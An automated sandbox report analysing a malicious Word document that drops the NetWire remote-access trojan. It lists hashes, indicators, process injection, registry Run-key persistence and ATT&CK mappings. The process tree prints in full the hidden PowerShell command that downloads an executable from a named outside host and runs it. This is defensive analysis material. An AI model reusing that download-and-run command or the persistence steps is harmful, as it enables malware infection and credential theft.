netwire | ca7d0cd170dc326645352637b21087e96576f33aafebcb59cb3ea28952d7214d

General

Target

Pokana2021011357.doc
Size

55KB
MD5

9a59fc2435737333486d786264c40542
SHA1

19ccdcf1cdafdd248080f7a0b4a481057125ebdf
SHA256

ca7d0cd170dc326645352637b21087e96576f33aafebcb59cb3ea28952d7214d
SHA512

eddb242b35355a91000d124a13bce5df1a929282f9ebf4554c261b14a1c473e75bf3c0d657f521b78d07e687ce26a749713a5aa9ffc908a53106b94744c69be5

Score

10^/10

netwire botnet persistence rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://one.oziriss.club:2095/ol/o1.exe

Signatures

NetWire RAT payload 6 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1116-10-0x0000000000E40000-0x0000000000E70000-memory.dmp	netwire
behavioral2/memory/1116-11-0x0000000000E4242D-mapping.dmp	netwire
behavioral2/memory/1116-13-0x0000000000E40000-0x0000000000E70000-memory.dmp	netwire
behavioral2/memory/1232-18-0x00000000013C0000-0x00000000013F0000-memory.dmp	netwire
behavioral2/memory/1232-19-0x00000000013C242D-mapping.dmp	netwire
behavioral2/memory/1232-21-0x00000000013C0000-0x00000000013F0000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	2008	576	powershell.exe	WINWORD.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

22 2008 powershell.exe
Executes dropped EXE 4 IoCs

Processes:

secure.exesecure.exefers.exefers.exe

pid process

2916 secure.exe
1116 secure.exe
3292 fers.exe
1232 fers.exe

flow	pid	process
22	2008	powershell.exe

pid	process
2916	secure.exe
1116	secure.exe
3292	fers.exe
1232	fers.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

fers.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\	fers.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\fers = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\fers.exe"	fers.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

secure.exefers.exe

description	pid	process	target process
PID 2916 set thread context of 1116	2916	secure.exe	secure.exe
PID 3292 set thread context of 1232	3292	fers.exe	fers.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

576 WINWORD.EXE
576 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2008 powershell.exe
2008 powershell.exe
2008 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2008 powershell.exe

pid	process
2008	powershell.exe
2008	powershell.exe
2008	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2008	powershell.exe

Suspicious use of SetWindowsHookEx 18 IoCs

Processes:

WINWORD.EXE

pid	process
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WINWORD.EXEpowershell.exesecure.exesecure.exefers.exe

description	pid	process	target process
PID 576 wrote to memory of 2008	576	WINWORD.EXE	powershell.exe
PID 576 wrote to memory of 2008	576	WINWORD.EXE	powershell.exe
PID 2008 wrote to memory of 2916	2008	powershell.exe	secure.exe
PID 2008 wrote to memory of 2916	2008	powershell.exe	secure.exe
PID 2008 wrote to memory of 2916	2008	powershell.exe	secure.exe
PID 2916 wrote to memory of 1116	2916	secure.exe	secure.exe
PID 2916 wrote to memory of 1116	2916	secure.exe	secure.exe
PID 2916 wrote to memory of 1116	2916	secure.exe	secure.exe
PID 2916 wrote to memory of 1116	2916	secure.exe	secure.exe
PID 2916 wrote to memory of 1116	2916	secure.exe	secure.exe
PID 1116 wrote to memory of 3292	1116	secure.exe	fers.exe
PID 1116 wrote to memory of 3292	1116	secure.exe	fers.exe
PID 1116 wrote to memory of 3292	1116	secure.exe	fers.exe
PID 3292 wrote to memory of 1232	3292	fers.exe	fers.exe
PID 3292 wrote to memory of 1232	3292	fers.exe	fers.exe
PID 3292 wrote to memory of 1232	3292	fers.exe	fers.exe
PID 3292 wrote to memory of 1232	3292	fers.exe	fers.exe
PID 3292 wrote to memory of 1232	3292	fers.exe	fers.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Pokana2021011357.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://one.oziriss.club:2095/ol/o1.exe',$env:Temp+'\secure.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\secure.exe')
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2008

C:\Users\Admin\AppData\Local\Temp\secure.exe
"C:\Users\Admin\AppData\Local\Temp\secure.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2916

C:\Users\Admin\AppData\Local\Temp\secure.exe
C:\Users\Admin\AppData\Local\Temp\secure.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1116

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3292

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1232

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Roaming\trftkoxoicklgdxkctuphueti84738.png
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/576-2-0x00007FFC303D0000-0x00007FFC30A07000-memory.dmp

Filesize
6.2MB

Download
memory/1116-10-0x0000000000E40000-0x0000000000E70000-memory.dmp

Filesize
192KB

Download
memory/1116-11-0x0000000000E4242D-mapping.dmp

Download
memory/1116-13-0x0000000000E40000-0x0000000000E70000-memory.dmp

Filesize
192KB

Download
memory/1232-21-0x00000000013C0000-0x00000000013F0000-memory.dmp

Filesize
192KB

Download
memory/1232-19-0x00000000013C242D-mapping.dmp

Download
memory/1232-18-0x00000000013C0000-0x00000000013F0000-memory.dmp

Filesize
192KB

Download
memory/2008-6-0x000002CA79FE0000-0x000002CA79FE1000-memory.dmp

Filesize
4KB

Download
memory/2008-4-0x00007FFC29BE0000-0x00007FFC2A5CC000-memory.dmp

Filesize
9.9MB

Download
memory/2008-5-0x000002CA79C30000-0x000002CA79C31000-memory.dmp

Filesize
4KB

Download
memory/2008-3-0x0000000000000000-mapping.dmp

Download
memory/2916-7-0x0000000000000000-mapping.dmp

Download
memory/3292-14-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads